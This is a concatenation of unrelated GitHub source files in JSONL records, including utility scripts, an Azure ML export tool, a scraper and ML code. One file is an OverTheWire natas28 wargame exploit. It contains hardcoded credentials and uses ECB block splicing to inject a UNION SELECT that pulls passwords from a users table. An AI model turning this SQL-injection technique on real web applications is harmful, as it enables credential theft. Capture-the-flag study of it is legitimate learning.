print(\"running on %s:%d\" % (HOST, PORT))\n app.run(host=HOST, port=PORT, debug=debug, threaded=threaded)\n\n\n run()\n","repo_name":"Caspar0-0/JPAnimationDatabase","sub_path":"casparchen-cs4111-proj1/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":13819,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"15317089628","text":"import subprocess\nimport tempfile\nfrom collections import defaultdict\nfrom sectools.common.utils.c_logging import logger\nimport os\nimport sys\nimport zipfile\n\nsplit_string_into_list_of_n_size_strings = lambda string, n:[string[i:i+n] for i in range(0, len(string), n)]\nxor = lambda x,y : x^y\njoin_ints_list_to_hex_string = lambda ints_list : \"\".join([(\"0x%0.2X\" % x)[2:] for x in ints_list])\n\nif \"check_output\" not in dir( subprocess ): # duck punch it in!\n def f(*popenargs, **kwargs):\n if 'stdout' in kwargs:\n raise ValueError('stdout argument not allowed, it will be overridden.')\n process = subprocess.Popen(stdout=subprocess.PIPE, *popenargs, **kwargs)\n output, unused_err = process.communicate()\n retcode = process.poll()\n if retcode:\n cmd = kwargs.get(\"args\")\n if cmd is None:\n cmd = popenargs[0]\n raise subprocess.CalledProcessError(retcode, ' '.join(cmd))\n return output\n subprocess.check_output = f\n\nclass LogWrappedFunction(object):\n def __init__(self, function):\n self.function = function\n\n def logAndCall(self, *arguments, **namedArguments):\n logger.debug(\"Calling %s with arguments %s and named arguments %s\" %\\\n (self.function.func_name, arguments, namedArguments))\n return self.function.__call__(*arguments, **namedArguments)\n\ndef logwrap(function):\n return LogWrappedFunction(function).logAndCall\n\n\ndef system_command_logged(command_list,stderr_to_temp = False, shell=False):\n tmp_stderr_file = None\n\n if stderr_to_temp == True:\n tmp_stderr_file=tempfile.NamedTemporaryFile(delete=False)\n logger.debug(\"Creating temp file for stderr of external command: \"+ tmp_stderr_file.name)\n logger.debug(\"Command List: \" + repr(command_list))\n logger.debug(\"Executing System command:\" + \" \".join(command_list))\n return subprocess.check_output(command_list, stderr=tmp_stderr_file, shell=shell)\n\ndef store_data_to_temp_file(data):\n temp_file = tempfile.NamedTemporaryFile(delete=False)\n logger.debug(\"Writing data: \")#+ repr(data))\n logger.debug(\"To temporary file: \" + temp_file.name)\n temp_file.write(data)\n temp_file.close()\n return temp_file.name\n\ndef store_data_to_file(file_name, data):\n file_handle = open(file_name,\"wb\")\n logger.debug(\"Writing data: \")#+ repr(data))\n logger.debug(\"To file: \" + file_handle.name)\n file_handle.write(data)\n file_handle.close()\n return file_handle.name\n\n\ndef normalize_param_list_into_dict(certificate_subject_list):\n \"\"\" Converts list of certificate params to dict\n input:\n certificate_subject_list: List of certificate param strings e.g.\n ['C=US', 'ST=California', 'L=San Diego', 'OU=General Use Test Key (for testing only)', 'OU=CDMA Technologies', 'O=QUALCOMM', 'CN=QCT Root CA 1']\n\n output:\n certificate_subject_dictionary: Dictionary of certificate params\n \"\"\"\n certificate_subject_list_normalized=[]\n for item in certificate_subject_list:\n temp_list=item.strip().split('=')\n temp_list[0]=temp_list[0].strip()\n temp_list[1]=temp_list[1].strip()\n certificate_subject_list_normalized.append(temp_list)\n\n dic=defaultdict(list)\n for item in certificate_subject_list_normalized:\n dic[item[0]].append(item[1])\n certificate_subject_dictionary={}\n for k in dic:\n if len(dic[k]) == 1:\n certificate_subject_dictionary[k]=dic[k][0]\n else:\n certificate_subject_dictionary[k]=dic[k]\n if 'OU' in certificate_subject_dictionary.keys() and type(certificate_subject_dictionary['OU'])==list:\n certificate_subject_dictionary['OU'].sort()\n return certificate_subject_dictionary\n\ndef _which_cmd(self, filename):\n if os.name.lower()=='nt' and sys.platform is not 'cygwin':\n filename+=\".exe\"\n matches=[]\n path_dirs = os.environ.get(\"PATH\").split(os.pathsep)\n path_dirs.insert(0,'.')\n path_dirs.insert(0,self.relative_path_to_packaged_openssl_windows_binary_path)\n\n for directory in path_dirs:\n fullpath = os.path.join(directory, filename)\n if os.path.isfile(fullpath):\n matches.append(fullpath)\n return matches\n\ndef get_data_from_file(file_path):\n with open(file_path,'rb') as f:\n data=f.read()\n return data\n\n\n\n","repo_name":"bcyj/android_tools_leeco_msm8996","sub_path":"common/scripts/SecImage/sectools/common/crypto/utility_functions.py","file_name":"utility_functions.py","file_ext":"py","file_size_in_byte":4349,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"37"} +{"seq_id":"18323812757","text":"import json\nimport argparse\nimport tempfile\nfrom azureml.core import Workspace\nfrom azureml.exceptions import WebserviceException\nfrom azureml._model_management._util import _get_mms_url, get_requests_session\nfrom azureml._model_management._constants import (\n AKS_WEBSERVICE_TYPE,\n ACI_WEBSERVICE_TYPE,\n UNKNOWN_WEBSERVICE_TYPE,\n MMS_SYNC_TIMEOUT_SECONDS,\n)\nfrom azureml.core.webservice import Webservice, AciWebservice, AksWebservice\nfrom azureml._restclient.clientbase import ClientBase\n\nMIGRATION_WEBSERVICE_TYPES = [AKS_WEBSERVICE_TYPE, ACI_WEBSERVICE_TYPE]\n\n\ndef export(\n ws: Workspace,\n service_name: str = None,\n timeout_seconds: int = None,\n show_output: bool = True,\n):\n \"\"\"\n Export all services under target workspace into template and parameters.\n :param ws: Target workspace.\n :param service_name: the service name to be migrated.\n :param show_output: Whether print outputs.\n :param timeout_seconds: Timeout settings for waiting export.\n \"\"\"\n base_url = _get_mms_url(ws)\n mms_endpoint = base_url + \"/services/\" + service_name\n headers = {\"Content-Type\": \"application/json\"}\n headers.update(ws._auth_object.get_authentication_header())\n try:\n resp = ClientBase._execute_func(\n get_requests_session().get,\n mms_endpoint,\n headers=headers,\n timeout=MMS_SYNC_TIMEOUT_SECONDS,\n )\n except:\n raise WebserviceException(f\"Cannot get service {service_name}\")\n\n if resp.status_code == 404:\n raise WebserviceException(f\"Service {service_name} does not exist.\")\n\n content = resp.content\n if isinstance(resp.content, bytes):\n content = resp.content.decode(\"utf-8\")\n service = json.loads(content)\n if service[\"state\"] != \"Healthy\":\n raise WebserviceException(\n f\"service {service_name} is unhealthy, migration with this tool is not supported.\"\n )\n compute_type = service[\"computeType\"]\n if compute_type.upper() not in MIGRATION_WEBSERVICE_TYPES:\n raise WebserviceException(\n 'Invalid compute type \"{}\". Valid compute types are \"{}\"'.format(\n compute_type, \",\".join(MIGRATION_WEBSERVICE_TYPES)\n )\n )\n compute_name = service_name\n if compute_type.upper() == AKS_WEBSERVICE_TYPE:\n compute_name = service[\"computeName\"]\n\n mms_endpoint = base_url + \"/services/export\"\n export_payload = {\"serviceName\": service_name}\n try:\n resp = ClientBase._execute_func(\n get_requests_session().post,\n mms_endpoint,\n headers=headers,\n json=export_payload,\n )\n except:\n raise WebserviceException(f\"Cannot get service {service_name}\")\n\n if resp.status_code == 202:\n service_entity = None\n if compute_type.upper() == AKS_WEBSERVICE_TYPE:\n service_entity = AksWebservice(ws, service_name)\n elif compute_type.upper() == ACI_WEBSERVICE_TYPE:\n service_entity = AciWebservice(ws, service_name)\n service_entity.state = \"Exporting\"\n service_entity._operation_endpoint = (\n _get_mms_url(service_entity.workspace)\n + f'/operations/{resp.content.decode(\"utf-8\")}'\n )\n state, _, operation = service_entity._wait_for_operation_to_complete(\n show_output, timeout_seconds\n )\n if state == \"Succeeded\":\n export_folder = operation.get(\"resourceLocation\").split(\"/\")[-1]\n storage_account = service_entity.workspace.get_details().get(\n \"storageAccount\"\n )\n if show_output:\n print(\n f\"Services have been exported to storage account: {storage_account} \\n\"\n f\"Folder path: azureml/{export_folder}\"\n )\n return storage_account.split(\"/\")[-1], export_folder, compute_name\n else:\n raise WebserviceException(\n \"Received bad response from Model Management Service:\\n\"\n \"Response Code: {}\\n\"\n \"Headers: {}\\n\"\n \"Content: {}\".format(resp.status_code, resp.headers, resp.content)\n )\n\n\ndef overwrite_parameters(\n parms: dict, endpoint_name: str = None, deployment_name: str = None\n):\n \"\"\"\n Overwrite parameters\n :param deployment_name: v2 online-deployment name. Default will be v1 service name.\n :param endpoint_name: v2 online-endpoint name. Default will be v1 service name.\n :param parms: parameters as dict: loaded v2 parameters.\n \"\"\"\n properties = parms[\"onlineEndpointProperties\"][\"value\"]\n traffic = parms[\"onlineEndpointPropertiesTrafficUpdate\"][\"value\"]\n properties.pop(\"keys\")\n traffic.pop(\"keys\")\n if endpoint_name:\n parms[\"onlineEndpointName\"][\"value\"] = endpoint_name\n\n # this is optional\n if deployment_name:\n parms[\"onlineDeployments\"][\"value\"][0][\"name\"] = deployment_name\n traffic[\"traffic\"][deployment_name] = traffic[\"traffic\"].pop(\n list(traffic[\"traffic\"].keys())[0]\n )\n\n temp_file = tempfile.NamedTemporaryFile(mode=\"w+\", suffix=\".json\", delete=False)\n json.dump(online_endpoint_deployment, temp_file)\n temp_file.flush()\n print(temp_file.name)\n\n\nif __name__ == \"__main__\":\n\n def parse_args():\n parser = argparse.ArgumentParser(description=\"Export v1 service script\")\n parser.add_argument(\n \"--export\", action=\"store_true\", help=\"using script for export services\"\n )\n parser.add_argument(\n \"--overwrite-parameters\",\n action=\"store_true\",\n help=\"using script for overwrite parameters purpose\",\n )\n parser.add_argument(\"-w\", \"--workspace\", type=str, help=\"workspace name\")\n parser.add_argument(\n \"-g\", \"--resource-group\", type=str, help=\"resource group name\"\n )\n parser.add_argument(\"-s\", \"--subscription\", type=str, help=\"subscription id\")\n parser.add_argument(\n \"-sn\",\n \"--service-name\",\n default=None,\n type=str,\n help=\"service name to be migrated\",\n )\n parser.add_argument(\n \"-e\",\n \"--export-json\",\n action=\"store_true\",\n dest=\"export_json\",\n help=\"show export result in json\",\n )\n parser.add_argument(\n \"-mp\", \"--parameters-path\", type=str, help=\"parameters file path\"\n )\n parser.add_argument(\n \"-me\",\n \"--migrate-endpoint-name\",\n type=str,\n default=None,\n help=\"v2 online-endpoint name, default is v1 service name\",\n )\n parser.add_argument(\n \"-md\",\n \"--migrate-deployment-name\",\n type=str,\n default=None,\n help=\"v2 online-deployment name, default is v1 service name\",\n )\n parser.set_defaults(compute_type=None)\n return parser.parse_args()\n\n # parse args\n args = parse_args()\n\n if args.export:\n workspace = Workspace.get(\n name=args.workspace,\n resource_group=args.resource_group,\n subscription_id=args.subscription,\n )\n storage_account, blob_folder, v1_compute = export(\n workspace, args.service_name, show_output=not args.export_json\n )\n if args.export_json:\n print(\n json.dumps(\n {\n \"storage_account\": storage_account,\n \"blob_folder\": blob_folder,\n \"v1_compute\": v1_compute,\n }\n )\n )\n\n if args.overwrite_parameters:\n with open(args.parameters_path) as f:\n online_endpoint_deployment = json.load(f)\n overwrite_parameters(\n online_endpoint_deployment,\n args.migrate_endpoint_name,\n args.migrate_deployment_name,\n )\n","repo_name":"Azure/azureml-examples","sub_path":"cli/endpoints/online/managed/migration/export-service-util.py","file_name":"export-service-util.py","file_ext":"py","file_size_in_byte":7975,"program_lang":"python","lang":"en","doc_type":"code","stars":1362,"dataset":"github-code","pt":"37"} +{"seq_id":"11255808232","text":"import cv2\nimport numpy as np\nimport os\nimport math\nimport imageprocess\nfrom array import array\nimport json\n\n\ndef radial_kernel(r, t, max_dist, step, dtdr=0.01):\n\n step = math.sin(step * math.pi / 2)\n if step < 0:\n r_ = r * (-step) + (1 + step) * max_dist / 5\n t_ = t - (max_dist - r_) * dtdr * (1 + step)\n else:\n r_ = r * (step) + (1 - step) * max_dist / 5\n t_ = t + (r_) * dtdr * (1 - step)\n\n return r_, t_\n\n\ndef morph(points, size, center, step):\n\n width, height = size\n\n nx = points[:, 0] - center[0]\n ny = points[:, 1] - center[1]\n r = np.sqrt(nx * nx + ny * ny)\n t = np.arctan2(ny, nx)\n\n r_, t_ = radial_kernel(r, t, math.sqrt(width * width + height * height), step)\n\n alpha = abs(step)\n x_ = r_ * np.cos(t_) + center[0] * (alpha) + (1 - alpha) * width * 0.5\n y_ = r_ * np.sin(t_) + center[1] * (alpha) + (1 - alpha) * height * 0.5\n\n return np.stack([x_, y_], axis=1)\n\n\ndef find_a_center(points):\n centroid = np.mean(points, axis=0)\n cx = centroid[0]\n\n crosses = []\n for i in range(points.shape[0] - 1):\n if (points[i, 0] < cx and cx <= points[i + 1, 0]) or (points[i, 0] >= cx and cx > points[i + 1, 0]):\n crosses.append((points[i, 1] + points[i + 1, 1]) * 0.5)\n\n max_value = 0\n max_index = 0\n for i in range(len(crosses) // 2):\n v = abs(crosses[2 * i] - crosses[2 * i + 1])\n if v > max_value:\n max_value = v\n max_index = i\n\n cy = (crosses[2 * max_index] + crosses[2 * max_index + 1]) * 0.5\n\n return (cx, cy)\n\n\ndef get_contour(img, size, invert=False):\n processed = imageprocess.process_raw(img, size, 0, 0, None, None, flip=False)\n contour = imageprocess.extract_contour(processed if not invert else 255 - processed)\n eqi_length = imageprocess.re_contour(contour, 256)\n return np.array(eqi_length)\n\n\ndef gen_target_for_web_download(cwd, size, invert):\n targets = []\n for file in sorted(os.listdir(cwd)):\n print(file)\n full_path = os.path.join(cwd, file)\n img = cv2.imread(full_path)\n targets.append(get_contour(img, size, invert))\n\n return np.array(targets, dtype=np.float32)\n\n\ndef save_target_for_web_download(save_path, source_dir, size, invert):\n targets = gen_target_for_web_download(source_dir, size, invert)\n\n with open(os.path.join(save_path, \"morph_data\", \"desc.json\"), 'w') as outfile:\n data = []\n data.append({\"t\": \"f\",\n \"shape\": targets.shape,\n \"scale\": size,\n \"path\": \"morph_data/morph.bin\"})\n json.dump(data, outfile)\n\n with open(os.path.join(save_path, \"morph_data\", \"morph.bin\"), 'wb') as output:\n array('f', targets.astype(np.float32).flatten().tolist()).tofile(output)\n\n\nif __name__ == '__main__':\n\n # img_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"templates\", \"large_template_front\", \"0.10.0,0,100,100.png\")\n\n size = (500, 500)\n raw_target_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"data\", \"morph_targets\")\n # img2_path = os.path.join(raw_target_dir, \"08.png\")\n\n # img = cv2.imread(img_path)\n # img2 = cv2.imread(img2_path)\n\n # points = get_contour(img, size)\n # center = find_a_center(points)\n # print(center)\n\n # points2 = get_contour(img2, (500, 500), True)\n\n # for i in np.arange(-1.0, 1.0, 0.05):\n # morphed_points = morph(points if i < 0 else points2, size, center if i < 0 else (250, 250), i)\n # canvas = cv2.fillPoly(np.zeros((size[1], size[0], 3)), [morphed_points.astype(np.int32)], (255, 255, 255), 8)\n # cv2.imshow(\"Gen\", canvas)\n # cv2.waitKey(30)\n\n # gen download file\n save_target_for_web_download(os.path.join(os.path.dirname(os.path.realpath(__file__)), \"web\"), raw_target_dir, size, True)\n","repo_name":"bitstudio/zodiac_google","sub_path":"morph.py","file_name":"morph.py","file_ext":"py","file_size_in_byte":3842,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"37"} +{"seq_id":"73806729067","text":"from node import Node\n\nammenities = Node('ammenities', [])\n\nspecial_needs = Node('special_needs', ammenities)\n\nspecial_needs_ask = Node('special_needs_ask', [ammenities,special_needs ])\n\naccommodation_time = Node('accommodation_time', [special_needs_ask])\nfood_options = Node('food_options', [accommodation_time])\n\nfood = Node('food', [food_options, accommodation_time])\n\nresults = Node('results', [])\n\nsearcher_distance = Node('searcher_distance', [results])\n\nsearcher_number = Node('searcher_number', [searcher_distance])\nofferer_number = Node('offerer_number', [food])\n\nlocation_check = Node('location_check', [searcher_number])\nofferer_location_check = Node('offerer_location_check', [offerer_number])\n\nsearcher_location = Node('searcher_location', [location_check])\nofferer_location = Node('offerer_location', [offerer_location_check])\n\nchoose_type = Node('choose_type', [searcher_location, offerer_location])\nindex = Node('index',[choose_type])\n\nROOT = index\n","repo_name":"olizhu10/ShelterMe","sub_path":"path.py","file_name":"path.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"16449827108","text":"import requests, os, datetime, json\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport numpy as np\n\n# Grabs the current table and not past ones\n\n# TO CHANGE ------------------------------\n# switch these to command line arguments\nyear = '2020' # if season is split over two years (ie 2020-2021), put the first year here\nfolder_name = 'epl'\nleague = 'ENG.1'\nold_csv = '2001_2020_tables.csv'\n# ----------------------------------------\n\n# GP W D L GF GA GD P\ncols = ['Place', 'Team', 'GP', 'W', 'D', 'L', 'GF', 'GA', 'GD', 'P'] # may need to switch these for other leagues (but prob not)\ntable_df = pd.DataFrame([], columns=cols)\n\nurl = \"https://www.espn.com/soccer/standings/_/league/{}/season/{}\".format(league, year) \n\nr = requests.get(url)\nr.raise_for_status()\nsoup = BeautifulSoup(r.text, \"html.parser\")\n\nteams_soup = soup.find_all('table')[0].find_all('div', class_='team-link flex items-center clr-gray-03')\nteams = []\n\nfor team in teams_soup:\n teams.append([team.contents[0].text, team.find('img').get('title')])\n\nstats = soup.find_all('span', class_='stat-cell')\n\n# Convert to np array and reshape\nstats = [item.text for item in stats]\nnp_stats = np.array(stats).reshape(-1, 8)\n\nfinal_arr = np.concatenate((np.array(teams).reshape(-1, 2), np_stats), axis=1)\ntemp_df = pd.DataFrame(final_arr, columns=cols)\ntemp_df['Year'] = year\ntable_df = table_df.append(temp_df, ignore_index=True)\n\n# if folder doesn't exist, make it\ntpath = os.path.join('data', folder_name, 'tables')\nif not os.path.exists(tpath):\n os.makedirs(tpath)\n \ntable_df.to_csv(os.path.join('data', folder_name, 'tables', year + '_table.csv'), index=False)\n\n# Add it to past tables\nif old_csv != '':\n all_tables_df = pd.read_csv(os.path.join('data', folder_name, 'tables', old_csv))\n all_tables_df = all_tables_df.append(table_df, ignore_index=True)\n all_tables_df.to_csv(os.path.join('data', folder_name, 'tables', 'all_tables.csv'), index=False)\n","repo_name":"jvmohr/dataScience","sub_path":"Soccer/General Data/soccer_table.py","file_name":"soccer_table.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"38935978175","text":"import json\nimport re\nimport time\nimport requests\n\n\ndef main():\n \n base_url = 'https://tv.blizzard.cn/action/activities/HDRewardReceive'\n headers = {\n \"user-agent\": \"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36\"\n }\n # 填cookie\n cookie = {\n \"cookie\": \" \"\n }\n # 填礼品id,默认为OW典藏包\n datas = {\n \"itemCode\": \"OW_UPGRADE\"\n }\n success = 0\n flag = 0\n for num in range(1, 500): \n print(num)\n request = requests.post(base_url, headers=headers, data=datas, cookies=cookie)\n d = json.loads(request.content.decode('utf8'))\n if d['msg'] == 'login':\n text = '暴雪cookie失效了,登陆失败'\n flag = 1\n else:\n if d['msg'] == 'item_limit':\n text = 'OW典藏包领取失败'\n print(d)\n elif d['msg'] == 'success':\n text = 'OW典藏包领取成功'\n print(d)\n flag = 1\n success = 1\n elif d['msg'] == 'exist_record':\n text = '您已拥有该礼品,请勿重复领取'\n print(d)\n flag = 1\n else:\n text = '未知原因引起失败'\n print(d)\n print(text)\n if num == 499:\n flag = 1\n text = '本次尝试领取失败'\n if flag == 1:\n # qq推送\n QmsgKey = \" \"\n if success == 1: \n content = f\"\"\"{text}{d}\"\"\"\n else:\n content = f\"\"\"{text}\"\"\"\n data = {\n \"msg\": content\n }\n url_send = \"https://qmsg.zendee.cn/send/%s\" % (QmsgKey)\n try:\n res = requests.post(url_send, data=data)\n sucmsg = res.json()['success']\n if sucmsg == True:\n print(\"qq推送服务成功\")\n else:\n print(\"qq推送服务失败\")\n except:\n print(\"qq推送参数错误\")\n if flag == 1:\n break\n else:\n time.sleep(3)\n\ndef main_handler(event, context):\n main()\n\nif __name__ == '__main__':\n main()\n","repo_name":"iskyil/Blizzard_TV","sub_path":"tencent/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2319,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"21486389268","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jul 3 12:05:20 2018\n\n@author: Guilherme Fernandes Alves\n\"\"\"\n\n\"\"\" PROBLEMA 8.2 \"\"\"\n### Dados dois inteiros positivos, calcular o máximo divisor comum entre eles\nprint(\"Algoritmo para calcular o mdc entre dois numeros\")\n\n\ndef mdc(a, b):\n i = 1\n mdc = 1\n while i <= a and i <= b:\n if a % i == 0 and b % i == 0:\n mdc = i\n i += 1\n return mdc\n\n\ndef main():\n a = int(input(\"Digite o primeiro numero: \"))\n b = int(input(\"Digite o segundo numero: \"))\n print(\"O Maximo divisor comum entre %d e %d eh: %d\" % (a, b, mdc(a, b)))\n\n\nmain()\nprint(\">>> PRONTO !!!\")\nfim = input(\"Tecle enter para encerrar\")\n","repo_name":"Gui-FernandesBR/MAC2166-2018","sub_path":"examples/3_functions/Problem8.1.py","file_name":"Problem8.1.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7263939625","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\ndef init_weights(m):\n if isinstance(m, nn.Linear):\n nn.init.kaiming_normal_(m.weight.data)\n m.bias.data.fill_(0)\n\n\nclass Dynamics(torch.nn.Module):\n\n def __init__(self, n_inputs, observation_space):\n super(Dynamics, self).__init__()\n\n self.observation_space = observation_space\n self.state_dim = observation_space.shape[0]\n\n # network architecture specification\n fc1_out = 200\n fc2_out = 200\n\n self.fc1 = nn.Linear(n_inputs, fc1_out)\n self.fc2 = nn.Linear(n_inputs, fc2_out)\n\n # Define the two heads of the network\n # -----------------------------------\n\n # * reward head\n # The reward head has only 1 output\n self.reward_linear = nn.Linear(fc2_out, 1)\n\n # * dynamics head\n # in the continuous case it has one output for the mean and one for the cov of the state dist\n # later the workers can sample from a normal distribution\n self.mu = nn.Linear(fc1_out, self.state_dim)\n self.sigma = nn.Linear(fc1_out, self.state_dim)\n\n # initialize the weights\n self.apply(init_weights)\n self.train()\n\n def forward(self, inputs):\n \"\"\"\n Defines the forward pass of the network.\n\n :param inputs: Input array object which sufficiently represents the full state of the environment.\n :return: reward, mu, sigma\n \"\"\"\n inputs = inputs.float()\n x = self.fc1(inputs)\n x = F.relu6(x)\n x = self.fc2(x)\n x = F.relu6(x)\n\n # clip state space\n print(self.observation_space.high)\n print(self.observation_space.low)\n\n reward = self.reward_linear(x)\n mu = torch.tanh(self.mu(x))\n sigma = F.softplus(self.sigma(x)) + 1e-5\n return reward, mu, sigma\n","repo_name":"QueensGambit/RL-Homework","sub_path":"Challenge_1/ModelsNN.py","file_name":"ModelsNN.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1139511878","text":"import pandas as pd\nimport numpy as np\nimport os\nimport scipy.io as sio\nfrom dataloaders.dataloader_base import BASE_DATA\n# ======================================== WARD_HAR_DATA =============================\nclass WARD_HAR_DATA(BASE_DATA):\n\n \"\"\"\n Reading: A cell structure.\n The number of cells is equal to the number of sensors in the network. \n Each cell contains an array structure of dimension 5×t, w\n here 5 corresponds to the sensor readings from 3-axis accelerometer and 2-axis gyroscope on one sensor node, \n and t represents the length of the trial sequence.\n\n • Sensor 1: Outside center of the lower left forearm joint. The y-axis of the gyroscope points to the hand.\n • Sensor 2: Outside center of the lower right forearm joint. The y-axis of the gyroscope points to the hand.\n • Sensor 3: Front center of the waist. The x-axis of the gyroscope points down.\n • Sensor 4: Outside center of the left ankle. The y-axis of the gyroscope points to the foot.\n • Sensor 5: Outside center of the right ankle. The y-axis of the gyroscope points to the foot.\n\t\n 20Hz\n \"\"\"\n def __init__(self, args):\n\n\n \"\"\"\n root_path : Root directory of the data set\n difference (bool) : Whether to calculate the first order derivative of the original data\n datanorm_type (str) : Methods of data normalization: \"standardization\", \"minmax\" , \"per_sample_std\", \"per_sample_minmax\"\n \n spectrogram (bool): Whether to convert raw data into frequency representations\n scales : Depends on the sampling frequency of the data \n wavelet : Methods of wavelet transformation\n\n \"\"\"\n\n\n self.used_cols = [0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24] \n # there are total 5 sensors, each has 5 channels\n\n poses = [\"left forearm\", \"right forearm\", \"waist\", \"left ankle\", \"right ankle\"]\n channel = [\"acc_x\", \"acc_y\", \"acc_z\", \"gyr_x\", \"gyr_y\"]\n self.col_names = [item for sublist in [[col+'_'+pos for col in channel] for pos in poses] for item in sublist]\n\n\n self.label_map = [(1, 'Rest at Standing'), \n (2, 'Rest at Sitting'), \n (3, 'Rest at Lying'), \n (4, 'Walk forward'), \n (5, 'Walk forward left-circle'), \n (6, 'Walk forward right-circle'), \n (7, 'Turn left'), \n (8, 'Turn right'), \n (9, 'Go upstairs'), \n (10, 'Go downstairs'), \n (11, 'Jog'), \n (12, 'Jump'), \n (13, 'Push wheelchair ')]\n # There are in totoal 13 !\n self.drop_activities = []\n\n\n # There are in total 20 subjects.\n self.train_keys = [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17]\n self.vali_keys = []\n self.test_keys = [18,19,20]\n\n self.exp_mode = args.exp_mode\n self.split_tag = \"sub\"\n\n self.LOCV_keys = [[1,2],[3,4],[5,6],[7,8],[9,10],[11,12],[13,14],[15,16],[17,18],[19,20]]\n\n self.all_keys = [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]\n\n self.sub_ids_of_each_sub = {}\n\n self.file_encoding = {} # no use \n \n self.labelToId = {int(x[0]): i for i, x in enumerate(self.label_map)}\n self.all_labels = list(range(len(self.label_map)))\n\n self.drop_activities = [self.labelToId[i] for i in self.drop_activities]\n self.no_drop_activites = [item for item in self.all_labels if item not in self.drop_activities]\n\n super(WARD_HAR_DATA, self).__init__(args)\n\n\n def load_all_the_data(self, root_path):\n\n print(\" ----------------------- load all the data -------------------\")\n\n df_dict = {}\n\n file_list = os.listdir(root_path)\n file_list = [file for file in file_list if \"Sub\" in file]\n\n assert len(file_list)==20\n\n for file in file_list:\n files_of_sub = os.listdir(os.path.join(root_path,file))\n sub = int(file[7:])\n for mat in files_of_sub:\n activity_id = int(mat[1:-6])\n trial = int(mat[-5])\n sub_id = \"{}_{}_{}\".format(sub, activity_id, trial)\n\n data = sio.loadmat(file_name=os.path.join(root_path, file, mat))\n\n values = np.concatenate([data[\"WearableData\"][0][0][5][0][0],\n data[\"WearableData\"][0][0][5][0][1],\n data[\"WearableData\"][0][0][5][0][2],\n data[\"WearableData\"][0][0][5][0][3],\n data[\"WearableData\"][0][0][5][0][4],],axis=1)\n\n df = pd.DataFrame(values, columns= self.col_names)\n df[\"sub\"] = sub\n df[\"activity_id\"] = activity_id\n df[\"sub_id\"] = sub_id\n\n\n if sub not in self.sub_ids_of_each_sub.keys():\n self.sub_ids_of_each_sub[sub] = []\n self.sub_ids_of_each_sub[sub].append(sub_id)\n df_dict[sub_id] = df\n # all data\n df_all = pd.concat(df_dict)\n df_all = df_all.set_index('sub_id')\n\n # Label Transformation\n df_all[\"activity_id\"] = df_all[\"activity_id\"].map(self.labelToId)\n\n # reorder the columns as sensor1, sensor2... sensorn, sub, activity_id\n df_all = df_all[self.col_names+[\"sub\"]+[\"activity_id\"]]\n\n data_y = df_all.iloc[:,-1]\n data_x = df_all.iloc[:,:-1]\n\n data_x = data_x.reset_index()\n # sub_id, sensor1, sensor2... sensorn, sub, \n\n return data_x, data_y","repo_name":"YexuZhou/git_conf_run_exp","sub_path":"dataloaders/dataloader_ward_har.py","file_name":"dataloader_ward_har.py","file_ext":"py","file_size_in_byte":5780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8641187351","text":"#!/bin/python3\n\nimport requests, urllib, base64\n\nsite = \"http://natas28.natas.labs.overthewire.org/\"\nauth = (\"natas28\", \"JWwR438wkgTsNKBbcJoowyysdM82YjeF\")\ns = requests.Session()\ns.auth = auth\n\nparams = {'query': ' ' * 10}\nres = s.get(site, params=params)\nblanks = urllib.parse.unquote(res.url.split('=')[1])\nblanks = base64.b64decode(blanks.encode('utf-8'))\nheader = blanks[:48]\nfooter = blanks[48:]\n\nsql = ' ' * 9 + \"' UNION ALL SELECT password FROM users;#\"\nparams = {'query': sql}\nres = s.get(site, params=params)\nexploit = urllib.parse.unquote(res.url.split('=')[1])\nexploit = base64.b64decode(exploit.encode('utf-8'))\n\nnblocks = len(sql) - 10\nlenBlock = (nblocks // 16 + 1) * 16\n\nparams = {'query': base64.b64encode(header + exploit[48:48 + lenBlock] + footer)}\nres = s.get(site + \"search.php\", params=params)\nprint(res.text)","repo_name":"ailtonbsj/live-overflow-tutorials","sub_path":"overthewire-natas/natas28-exploit/step4.py","file_name":"step4.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71202672746","text":"import numpy as np\nimport torch\n\ndef fast_hist(pred, label, n):\n k = (label >= 0) & (label < n)\n bin_count = np.bincount(\n n * label[k].astype(int) + pred[k], minlength = n ** 2)\n torch.cuda.empty_cache()\n return bin_count[:n ** 2].reshape(n, n)\n\n\ndef per_class_iu(hist):\n return np.diag(hist) / (hist.sum(1) + hist.sum(0) - np.diag(hist))\n\n\ndef fast_hist_crop(output, target, unique_label):\n hist = fast_hist(output.flatten(), target.flatten(), np.max(unique_label) + 1)\n hist = hist[unique_label, :]\n hist = hist[:, unique_label]\n return hist\n\n#\n# # 统计参数量\n# total = sum([param.nelement() for param in my_model.parameters()])\n# print(\"Number of parameter: % .2fM\" % (total / 